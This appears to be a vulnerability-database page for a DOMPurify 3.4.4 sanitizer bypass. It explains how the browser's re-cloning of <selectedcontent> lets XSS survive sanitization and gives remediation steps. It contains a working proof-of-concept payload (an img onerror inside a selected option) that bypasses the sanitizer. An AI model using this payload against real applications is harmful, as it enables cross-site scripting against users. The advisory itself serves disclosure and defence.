Severity by source
AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N
Primary rating from Vendor (https://github.com/cure53/DOMPurify) · only source for this CVE.
CVSS VectorVendor: https://github.com/cure53/DOMPurify
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N
Lifecycle Timeline
3Blast Radius
ecosystem impact- 1 npm packages depend on dompurify (1 direct, 0 indirect)
Ecosystem-wide dependent count for version 3.4.4.
DescriptionCVE.org
Summary
DOMPurify 3.4.4 allows selectedcontent by default, allowing a chain in which browsers "re-clone" an XSS payload after sanitization, effectively bypassing DOMPurify.
Details
The chain is as follows:
- The browser parses the input and creates a
<selectedcontent>clone from the selected<option> - DOMPurify walks and sanitizes that generated clone.
- DOMPurify reaches the original
<option>and removesselected=javascript:1 - The browser refreshes the
<selectedcontent>clone from the originaloption's content. - The refreshed clone is in a subtree DOMPurify already walked, which DOMPurify doesn't go back to sanitize
- The returned string contains unsanitized markup inside
<selectedcontent>.
PoC
const dirty =
'<select><button><selectedcontent></selectedcontent></button>' +
'<option selected=javascript:1>' +
'<img src=x onerror=alert(1)>x' +
'</option></select>';
const clean = DOMPurify.sanitize(dirty);
console.log(clean);
document.body.innerHTML = clean;Observed "sanitized" output in Chromium 148/WebKit 625:
<select><button><selectedcontent><img src="x" onerror="alert(1)">x</selectedcontent></button><option><img src="x">x</option></select>After reinsertion, the browser updates the live DOM and strips the handler from the displayed clone, but the onerror has already fired:
<select><button><selectedcontent><img src="x">x</selectedcontent></button><option><img src="x">x</option></select>Reproduced in Chromium and WebKit, but not Safari (not yet latest WebKit) or Firefox. Will likely change with browser support for selectedcontent.
Impact
This is a default-configuration DOMPurify sanitizer bypass resulting in XSS.
Applications are impacted if they sanitize attacker-controlled HTML with DOMPurify 3.4.4 using the string-input path and then insert the returned string into the page, for example with innerHTML.
AnalysisAI
Cross-site scripting via sanitizer bypass affects DOMPurify 3.4.4, the widely used npm HTML sanitization library maintained by cure53. The flaw stems from <selectedcontent> being permitted by default, allowing attackers to leverage browser re-cloning behavior so that an XSS payload is reinjected into a subtree DOMPurify has already walked. No public exploit identified at time of analysis in the form of in-the-wild attacks, but a fully working PoC is published in the GHSA advisory and active exploitation status is not listed in CISA KEV.
Technical ContextAI
DOMPurify is a JavaScript DOM-only XSS sanitizer for HTML, MathML, and SVG distributed via npm as dompurify. The vulnerability is a classic CWE-79 (Improper Neutralization of Input During Web Page Generation) realized through a parser-mutation race: the new HTML <selectedcontent> element (a live clone reflecting the currently selected <option> inside a customizable <select>) is rebuilt by the browser whenever the source option changes. DOMPurify walks the DOM tree once and removes the malicious selected=javascript:1 attribute on the original <option>, but that removal triggers the browser to refresh the <selectedcontent> subtree with the still-unsanitized <img onerror=...> markup from the option's children. Because the sanitizer does not revisit already-walked subtrees, the refreshed clone is serialized back into the returned string. The CPE pkg:npm/dompurify confirms the package scope is the npm distribution; the Chromium/WebKit-only reproduction reflects current browser support for selectedcontent.
RemediationAI
Vendor-released patch: upgrade dompurify from 3.4.4 to 3.4.5 or later via npm install dompurify@^3.4.5 (or the equivalent yarn/pnpm command) and redeploy bundles consuming the library; verify lockfiles and any vendored copies. Until patching is possible, deny selectedcontent explicitly through DOMPurify config (DOMPurify.sanitize(input, { FORBID_TAGS: ['selectedcontent'] })) or switch consumers to the DOM-returning path (RETURN_DOM_FRAGMENT: true) and insert the resulting nodes directly, which avoids re-serialization and the browser re-clone step - the trade-off is a code change at every call site and loss of string interoperability. Treating <select>/<option> content as untrusted via a stricter ALLOWED_TAGS allowlist is another compensating control, at the cost of breaking legitimate select dropdowns in user content. Refer to the GHSA advisory at https://github.com/cure53/DOMPurify/security/advisories/GHSA-87xg-pxx2-7hvx for the authoritative fix metadata.
The PDF reader in Mozilla Firefox before 39.0.3, Firefox ESR 38.x before 38.1.1, and Firefox OS before 2.2 allows remote
Mozilla Firefox before 22.0, Firefox ESR 17.x before 17.0.7, Thunderbird before 17.0.7, and Thunderbird ESR 17.x before
Mozilla Firefox before 18.0, Firefox ESR 10.x before 10.0.12 and 17.x before 17.0.2, Thunderbird before 17.0.2, Thunderb
Use-after-free vulnerability in the serializeToStream implementation in the XMLSerializer component in Mozilla Firefox b
The Chrome Object Wrapper (COW) implementation in Mozilla Firefox before 16.0, Firefox ESR 10.x before 10.0.8, Thunderbi
The crypto.generateCRMFRequest function in Mozilla Firefox before 23.0, Firefox ESR 17.x before 17.0.8, Thunderbird befo
An issue was discovered in the Cisco WebEx Extension before 1.0.7 on Google Chrome, the ActiveTouch General Plugin Conta
The XrayWrapper implementation in Mozilla Firefox before 35.0 and SeaMonkey before 2.32 does not properly interact with
The Chrome Object Wrapper (COW) implementation in Mozilla Firefox before 18.0, Firefox ESR 17.x before 17.0.2, Thunderbi
The Web IDL implementation in Mozilla Firefox before 28.0, Firefox ESR 24.x before 24.4, Thunderbird before 24.4, and Se
Mozilla Firefox before 28.0, Firefox ESR 24.x before 24.4, Thunderbird before 24.4, and SeaMonkey before 2.25 allow remo
The Firefox sandbox in Adobe Flash Player before 10.3.183.67 and 11.x before 11.6.602.171 on Windows and Mac OS X, and b
Same weakness CWE-79 – Cross-site Scripting (XSS)
View allShare
External POC / Exploit Code
Leaving vuln.today
EUVD-2026-44443
GHSA-87xg-pxx2-7hvx